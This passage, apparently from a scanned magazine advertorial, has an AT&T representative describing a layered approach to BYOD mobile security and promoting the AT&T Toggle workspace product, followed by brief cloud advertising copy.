security  strategy.  One  that  takes  into  account 
the  networks,  the  data  and  the  device.  It’s  really 
about  protecting  the  network  connectivity,  se¬ 
curing  the  organization’s  data  and  applications, 
and  keeping  malicious  codes  off  their  devices. 

How  is  AT&T  helping  organizations  deal 
with  the  mobile  security  concerns  of  BYOD? 

AT&T  has  a  layered  approach  to  end-to-end  secu¬ 
rity.  We  start  with  strong  device  management  and 
mobile  security  capabilities,  then  layer  in  highly 
secure  connections,  similar  to  protection  offered 
behind  corporate  firewalls.  To  provide  this  without 
complexity,  we  use  AT&T  Toggle,  a  highly  secure 
mobile  workspace  management  solution,  which  of¬ 
fers  anti-virus  and  malware  protection  for  Android"1 
devices  and  can  be  integrated  with  network  security 
controls  such  as  existing  VPN  solutions.  What 
makes  this  simple  is  users  have  an  integrated  front 
end,  and  everything  else  is  built  underneath. 


Android™  is  a  trademark  of  Google  Inc. 
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Nothing  is  shaping  successful  businesses  faster  than  IT.  Which  makes  your  job  rather  important. 
And  when  you  can  harness  all  that  the  cloud  is  capable  of,  just  watch  your  business  go. 
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